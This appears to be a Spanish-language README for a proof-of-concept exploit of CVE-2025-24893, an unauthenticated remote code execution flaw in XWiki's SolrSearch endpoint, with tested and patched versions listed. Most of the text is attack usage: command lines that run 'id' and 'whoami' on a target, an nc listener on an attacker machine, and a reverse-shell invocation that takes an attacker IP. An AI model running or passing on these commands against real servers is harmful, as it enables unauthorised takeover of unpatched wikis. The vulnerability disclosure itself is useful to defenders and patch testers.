
PoC de RCE no autenticada para XWiki SolrSearch (CVE-2025-24893). Ejecución de comandos + shell inversa.
PoC de RCE no autenticada para XWiki SolrSearch (CVE-2025-24893). Ejecución de comandos + shell inversa.
Prueba de concepto para la inyección de plantillas SolrSearch de XWiki que permite la ejecución remota de código sin autenticación.
Probado contra XWiki Debian 15.10.8 (parcheado en 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Solo para uso educativo. No lo ejecutes contra sistemas que no sean tuyos o para los que no tengas permiso explícito.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Especifica el host objetivo (y la ruta opcional) al ejecutar el script.
Ejecuta comandos básicos:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Inicia una shell inversa:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...